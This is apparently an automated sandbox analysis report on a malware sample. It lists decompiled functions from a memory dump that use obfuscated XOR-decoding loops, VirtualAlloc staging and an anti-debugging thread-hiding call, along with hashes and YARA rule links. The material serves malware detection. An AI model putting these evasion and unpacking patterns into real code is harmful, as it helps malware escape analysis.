VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 28856d65f9e51af5628fead91b2199e18375d788ff6af4880ed9c622c8ff4f51
Instruction ID: 83d1a1db2d3a53d570aefbd98cfad7ad2bd53ce1df07f459270c4e8dc3247951
Opcode Fuzzy Hash: 28856d65f9e51af5628fead91b2199e18375d788ff6af4880ed9c622c8ff4f51
Instruction Fuzzy Hash: A5B127B2F4E111CBE3645A50A840B307A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040617C, Relevance: 1.6, APIs: 1, Instructions: 380
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 28%

			E0040617C() {
				void* _t10;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t32;
				unsigned int _t34;
				unsigned int _t35;
				unsigned int _t36;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				unsigned int _t42;
				unsigned int _t43;
				unsigned int _t44;
				unsigned int _t45;
				unsigned int _t46;

				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("rcl ecx, 1");
				asm("ror dword [edi], 1");
				do {
					_t35 = _t34 + 1;
					_t36 = _t35;
					_t24 =  *0x407a5c;
					_t37 = _t36 >> 0;
					_t25 = _t24 ^ _t37;
					asm("cld");
					_t34 = _t37 >> 0;
				} while (_t25 != _t10);
				asm("cld");
				_t38 = _t34;
				asm("cld");
				asm("cld");
				_t39 = _t38 >> 0;
				asm("cld");
				asm("cld");
				_t40 = _t39;
				_t41 = _t40 >> 0;
				_t32 =  *((intOrPtr*)(0x401014));
				do {
					_t42 = _t41 >> 0;
					_t43 = _t42;
					_t32 = _t32 - 1;
					asm("cld");
					asm("cld");
					_t44 = _t43 >> 0;
					asm("cld");
					_t45 = _t44;
					_t46 = _t45 >> 0;
					_t41 = _t46 >> 0;
				} while ( *_t32 != 0xffcc88ea);
				asm("out dx, eax");
				_push(ss);
				asm("cld");
				while(1) {
					asm("cld");
				}
			}

0x0040617c
0x0040617e
0x00406180
0x00406182
0x00406184
0x00406186
0x00406188
0x0040618a
0x0040618c
0x0040618e
0x00406190
0x00406192
0x00406194
0x00406196
0x00406198
0x004061de
0x004061fa
0x0040625c
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x004063f1
0x004063fe
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5e1e9bf7dc220c2667e9dc4ad5b34cd499d591440a18b555b018406da1e7dcfc
Instruction ID: 7ae230f012f0e5b784ffd41022e88e3134fb9e049429cc08ceba9fb0bbf1bf7c
Opcode Fuzzy Hash: 5e1e9bf7dc220c2667e9dc4ad5b34cd499d591440a18b555b018406da1e7dcfc
Instruction Fuzzy Hash: 84B138B2F4E111CBE3245A50A840B307A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 00406317, Relevance: 1.6, APIs: 1, Instructions: 380
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E00406317() {
				void* _t10;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t32;
				signed int* _t33;
				unsigned int _t34;
				unsigned int _t35;
				unsigned int _t36;
				unsigned int _t37;
				unsigned int _t38;
				unsigned int _t39;
				unsigned int _t40;
				unsigned int _t41;
				unsigned int _t42;
				unsigned int _t43;
				unsigned int _t44;
				unsigned int _t45;
				unsigned int _t46;

				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc dl, [edx]");
				asm("adc cl, [edi]");
				while(1) {
					_t25 = _t24 ^ _t37;
					asm("cld");
					_t34 = _t37 >> 0;
					if(_t25 != _t10) {
						_t35 = _t34 + 1;
						_t36 = _t35;
						_t24 =  *_t33;
						_t37 = _t36 >> 0;
						continue;
					}
					asm("cld");
					_t38 = _t34;
					asm("cld");
					asm("cld");
					_t39 = _t38 >> 0;
					asm("cld");
					asm("cld");
					_t40 = _t39;
					_t41 = _t40 >> 0;
					_t32 =  *((intOrPtr*)(0x401014));
					do {
						_t42 = _t41 >> 0;
						_t43 = _t42;
						_t32 = _t32 - 1;
						asm("cld");
						asm("cld");
						_t44 = _t43 >> 0;
						asm("cld");
						_t45 = _t44;
						_t46 = _t45 >> 0;
						_t41 = _t46 >> 0;
					} while ( *_t32 != 0xffcc88ea);
					asm("out dx, eax");
					_push(ss);
					asm("cld");
					while(1) {
						asm("cld");
					}
				}
			}

0x00406317
0x00406319
0x0040631b
0x0040631d
0x0040631f
0x00406321
0x00406323
0x00406325
0x00406327
0x00406329
0x0040632b
0x0040632d
0x0040632f
0x00406331
0x00406333
0x00406335
0x00406337
0x00406339
0x0040633b
0x0040633d
0x0040633f
0x00406341
0x00406343
0x00406345
0x00406347
0x00406349
0x0040634b
0x0040634d
0x0040634f
0x00406351
0x00406353
0x00406355
0x00406357
0x00406359
0x0040635b
0x0040635c
0x0040639e
0x004063a5
0x004063f1
0x00406400
0x004061fa
0x0040625c
0x004062d1
0x004062d3
0x00000000
0x00406315
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca
0x00406cce

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e01153de6083e2930806b64fe5b806ac064bfbb6d47957bd02227a4d03a7488e
Instruction ID: 2a4974437e84a06920f1cdb597fecc280d58b49d7c42ad16ab8f6c3cae40b058
Opcode Fuzzy Hash: e01153de6083e2930806b64fe5b806ac064bfbb6d47957bd02227a4d03a7488e
Instruction Fuzzy Hash: 6FB128B2F4E111CBE3644A50A840B317A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 02328664, Relevance: 1.6, APIs: 1, Instructions: 125nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID:
API String ID: 1221416862-0
Opcode ID: 936b0c5883025a63d8a1cf6ec0344c796f44ff949c4fb89ff72cd939e5f1f05b
Instruction ID: bba79f7c397e2e3c7db1b3ab77050b3de2c3a110252314360cbc70f9fe9f570c
Opcode Fuzzy Hash: 936b0c5883025a63d8a1cf6ec0344c796f44ff949c4fb89ff72cd939e5f1f05b
Instruction Fuzzy Hash: 744105302063358EEF296E24C9647F673AABF01315F59512DCD429B992E734C4CCCA31

Uniqueness

Uniqueness Score: -1.00%

Function 004062A9, Relevance: 1.6, APIs: 1, Instructions: 368memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0c5b039b291021d56472098ad406d65d985d7256f34a8523e1c4db6871153ae1
Instruction ID: 72238e1ae2dcf9613e017f021a4d1f665857dabd3847678bb3533ff8bad8790e
Opcode Fuzzy Hash: 0c5b039b291021d56472098ad406d65d985d7256f34a8523e1c4db6871153ae1
Instruction Fuzzy Hash: 43B117B2F4E111CBE3644A50A840B317A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040619F, Relevance: 1.6, APIs: 1, Instructions: 366memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 028bc744551224da148e3fe4ee9363590efda5bcaedcf38fe5148a8bc0f0ed46
Instruction ID: b5c201216e1890cf75c8c19c98285334711c70a9ffd1e6fd5a053c9071029614
Opcode Fuzzy Hash: 028bc744551224da148e3fe4ee9363590efda5bcaedcf38fe5148a8bc0f0ed46
Instruction Fuzzy Hash: 0FB138B2F4E111CBE3245A50A840B317A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004063A8, Relevance: 1.6, APIs: 1, Instructions: 366
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E004063A8() {
				void* _t10;
				signed int _t24;
				signed int _t25;
				intOrPtr* _t32;
				void* _t33;
				signed int* _t63;
				unsigned int _t64;
				unsigned int _t65;
				unsigned int _t66;
				signed int _t67;
				unsigned int _t68;
				unsigned int _t69;
				unsigned int _t70;
				unsigned int _t71;
				unsigned int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int _t75;
				unsigned int _t76;

				_t63 = _t33 + 0x1e;
				while(1) {
					_t64 = _t67 >> 0;
					if(_t25 != _t10) {
						_t65 = _t64 + 1;
						_t66 = _t65;
						_t24 =  *_t63;
						_t67 = _t66 >> 0;
						_t25 = _t24 ^ _t67;
						asm("cld");
						continue;
					}
					asm("cld");
					_t68 = _t64;
					asm("cld");
					asm("cld");
					_t69 = _t68 >> 0;
					asm("cld");
					asm("cld");
					_t70 = _t69;
					_t71 = _t70 >> 0;
					_t32 =  *((intOrPtr*)(0x401014));
					do {
						_t72 = _t71 >> 0;
						_t73 = _t72;
						_t32 = _t32 - 1;
						asm("cld");
						asm("cld");
						_t74 = _t73 >> 0;
						asm("cld");
						_t75 = _t74;
						_t76 = _t75 >> 0;
						_t71 = _t76 >> 0;
					} while ( *_t32 != 0xffcc88ea);
					asm("out dx, eax");
					_push(ss);
					asm("cld");
					while(1) {
						asm("cld");
					}
				}
			}

0x004063c5
0x004063c6
0x004063f1
0x00406400
0x004061fa
0x0040625c
0x004062d1
0x004062d3
0x0040639e
0x004063a5
0x00000000
0x004063a5
0x00406433
0x004064a7
0x0040651d
0x00406552
0x00406559
0x004065f8
0x00406646
0x004066de
0x004066fc
0x0040676b
0x004067e1
0x004067e1
0x0040680d
0x00406820
0x004068e7
0x0040691f
0x00406990
0x00406a5f
0x00406aa4
0x00406b33
0x00406b56
0x00406b87
0x00406bb6
0x00406bb9
0x00406c9b
0x00406cce
0x00406cee
0x00406cca
0x00406cce

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 08d411d3a456389c68baa8d95c3fcf0f1eeb985b0afc91d81c24acd776801adb
Instruction ID: 203d17885cc2a1a3939fa3701ddb07ce4143f4cc20ce2fb97923419866e31b33
Opcode Fuzzy Hash: 08d411d3a456389c68baa8d95c3fcf0f1eeb985b0afc91d81c24acd776801adb
Instruction Fuzzy Hash: 9EA127B2F4E111CBE3644A50A840B317A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 0040646C, Relevance: 1.6, APIs: 1, Instructions: 361memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 972bbc5d46aba39420f16b0f7327a79486bac08c53a5f9e1e3b50edab02fe5a5
Instruction ID: 3eb5e5e6241d70ffe66e3ee89d44cb4e054c126621fc7b1d4662b7c0b315dd87
Opcode Fuzzy Hash: 972bbc5d46aba39420f16b0f7327a79486bac08c53a5f9e1e3b50edab02fe5a5
Instruction Fuzzy Hash: BCA128B2F4E101CBE3644A50E840B317A31AB43304FB265BB99073A5D6D77D6963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004063CC, Relevance: 1.6, APIs: 1, Instructions: 360COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bed0c8c0b17d56412ce616efef8d454afdb5ef6721acafeca45b46526b5f14
Instruction ID: b4122cddfc47f1c3c1e706c5e209bc698ea209a877730256c43f5b723fadf28d
Opcode Fuzzy Hash: f7bed0c8c0b17d56412ce616efef8d454afdb5ef6721acafeca45b46526b5f14
Instruction Fuzzy Hash: 68A138B2F4E111CBE3244A50A840B317A31AB43304FB265BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 023287AC, Relevance: 1.6, APIs: 1, Instructions: 107nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID:
API String ID: 1221416862-0
Opcode ID: ff303cb95fcd6b5dc7bb897b50e993d9af5a88caf94b28a884efcef466495317
Instruction ID: 18cf0979be0ac4325fc0c8d7ecfe92db05199b3a6ddbdb989320b446d31acbfa
Opcode Fuzzy Hash: ff303cb95fcd6b5dc7bb897b50e993d9af5a88caf94b28a884efcef466495317
Instruction Fuzzy Hash: 7031D5306473358EEF296E24C4647B673A9BF01315F59616DCD829B992E734C8CCCA72

Uniqueness

Uniqueness Score: -1.00%

Function 023287F8, Relevance: 1.6, APIs: 1, Instructions: 105nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID:
API String ID: 1221416862-0
Opcode ID: 00f67fdd78e44c19b6029d067ad0ef766952da56e16712319c4a80890adabb93
Instruction ID: eeba86eba559b4cd785f693b1816f92f9e7be3156a5b748c65ff04d38e8ba2be
Opcode Fuzzy Hash: 00f67fdd78e44c19b6029d067ad0ef766952da56e16712319c4a80890adabb93
Instruction Fuzzy Hash: A931E4306073358EEF296E24C4647B673A9BF01325F59616DCD829B992E734C8CCCA72

Uniqueness

Uniqueness Score: -1.00%

Function 02328840, Relevance: 1.6, APIs: 1, Instructions: 103nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID:
API String ID: 1221416862-0
Opcode ID: 156951aa6e7c34933b7c530e6350a89d3f2f95db807e53976dc3e8605d000c49
Instruction ID: b4f2f432c97094384698154c04a3defa511e15ae35a9411dd0c6485cf46c2055
Opcode Fuzzy Hash: 156951aa6e7c34933b7c530e6350a89d3f2f95db807e53976dc3e8605d000c49
Instruction Fuzzy Hash: B231E4306173358EEF295E24C4547A673A9BF01325F59616DCD429B991E734C4CCCB72

Uniqueness

Uniqueness Score: -1.00%

Function 0232886F, Relevance: 1.6, APIs: 1, Instructions: 102nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID:
API String ID: 1221416862-0
Opcode ID: de177ce9c83bfb5dd6cc4a2d6863d85ccac5d16ba74ba1e5c6de1fe7ae7a5282
Instruction ID: b49b3a0ee83a7a8ba10def1bdf2a0f089789e941f42db99ddde527608f4e8962
Opcode Fuzzy Hash: de177ce9c83bfb5dd6cc4a2d6863d85ccac5d16ba74ba1e5c6de1fe7ae7a5282
Instruction Fuzzy Hash: 1231F3306062358EEB285E24C4687A673A9BF01325F99656DC9429B891E734C4CCCB72

Uniqueness

Uniqueness Score: -1.00%

Function 00406673, Relevance: 1.6, APIs: 1, Instructions: 350memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e0f774dc12245baeb09e0378b4c8b5c0b6a645e4d5f05e2118b23b161c83a904
Instruction ID: 192deb8d9d5a3d925ccbc46d34044afa7e7a26e2bac26d9cdedc830f0bfb638d
Opcode Fuzzy Hash: e0f774dc12245baeb09e0378b4c8b5c0b6a645e4d5f05e2118b23b161c83a904
Instruction Fuzzy Hash: 949127B2F4E101CBE3204A54E840B307A31AB43344FB265BB99077A5D2D77D6963BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406520, Relevance: 1.6, APIs: 1, Instructions: 349memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: ca13767d7c839b6675b7064044eeaa122196be74cf97af88e54f11f337aa4cd4
Instruction ID: 3550ab5f5c85a13b9a42d6f0615a1bd00f03a9df4003cab44d97f6659b3017ec
Opcode Fuzzy Hash: ca13767d7c839b6675b7064044eeaa122196be74cf97af88e54f11f337aa4cd4
Instruction Fuzzy Hash: 2DA139B2F4E101CBE3644A50E840B317A31AB43304FB265BB99073A5D6D77D6963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 023288C8, Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID:
API String ID: 1221416862-0
Opcode ID: c12d61bbbf2fabf4662c89d480960f7b5d738347a37ac10cf23606976b397990
Instruction ID: 4f5d70ab47622fdc2f8e812d056b95506bd8805b7b1a2915466c9ea3fed30d3d
Opcode Fuzzy Hash: c12d61bbbf2fabf4662c89d480960f7b5d738347a37ac10cf23606976b397990
Instruction Fuzzy Hash: 3031F5306073348EEF285E24C4587B673A5BF02325F99615DC9429B991E774C4CCCB32

Uniqueness

Uniqueness Score: -1.00%

Function 02328910, Relevance: 1.6, APIs: 1, Instructions: 94nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 971e708b988d5f43d2c5d8e88d4920a3aa6c5405b9cb22c4a5a2284a04ce3f02
Instruction ID: 9894c079276481cc6629d597972dba24f4fd299922604ace41bfce46ec398a4b
Opcode Fuzzy Hash: 971e708b988d5f43d2c5d8e88d4920a3aa6c5405b9cb22c4a5a2284a04ce3f02
Instruction Fuzzy Hash: D031F5306033348EEF286E24C4947A673A5BF02325F99615DC9429B991E774C8CCCB71

Uniqueness

Uniqueness Score: -1.00%

Function 00406391, Relevance: 1.6, APIs: 1, Instructions: 342memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: bfb3423bde29efec1142e52fe652a7e624751c1098c8f957f84e7fb1e5d0c0bd
Instruction ID: 06c799e1a8090cd444dbe11c3491e3011af378268403e0be6f914c75d09e61da
Opcode Fuzzy Hash: bfb3423bde29efec1142e52fe652a7e624751c1098c8f957f84e7fb1e5d0c0bd
Instruction Fuzzy Hash: E1B137B2F4E111CBE3244A54A840B307A31AB43304FB365BB99073A5D6D77D2963BA4F

Uniqueness

Uniqueness Score: -1.00%

Function 004066B0, Relevance: 1.6, APIs: 1, Instructions: 339memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9cccb775013d307f6000cde60e069c0964e06e9c3cd646b165ecc06e17fc9b12
Instruction ID: 10611355a05f70b116882ce5b6f898e25e909d9c7e063ce710ad290219a7c6f1
Opcode Fuzzy Hash: 9cccb775013d307f6000cde60e069c0964e06e9c3cd646b165ecc06e17fc9b12
Instruction Fuzzy Hash: 339128B2F4E101CBE3604A54E840B307A31AB43344FB265BB99077A5D2D77C6963BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 00406840, Relevance: 1.6, APIs: 1, Instructions: 337memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000E000,FFFF88A4,FFFFFE58,00407A5C), ref: 00407622

Memory Dump Source

Source File: 00000000.00000002.449562359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.449556875.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.449589893.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.449599587.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 632dabb508c539558557ee23a8d71e385361faa14efffb321ffc5fc7de070eba
Instruction ID: f39e2d02924f4ff48b687809be18ba29faac1878f1894839baba9a3e1a0736b3
Opcode Fuzzy Hash: 632dabb508c539558557ee23a8d71e385361faa14efffb321ffc5fc7de070eba
Instruction Fuzzy Hash: 0E8125B2F4E101CBE3204A54E880B307A31AB43344FB265BB99077A5D2D77C6953BA5F

Uniqueness

Uniqueness Score: -1.00%

Function 023289B0, Relevance: 1.6, APIs: 1, Instructions: 86nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02328D14,F21FD920,02328801,?,00000000), ref: 023208FB
NtResumeThread.NTDLL ref: 02328C7B

Memory Dump Source

Source File: 00000000.00000002.450789096.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Similarity

API ID: Thread$InformationResume
String ID:
API String ID: 1221416862-0
Opcode ID: 34bcad99d6e4df8d5f25087dca356fe843a9e0b374d8d10cbf7278d4331fccb8
Instruction ID: 4885eca9ac9dc435fd45135524a2e6f7a0ab94b203d464f236630dbb67e28cd2
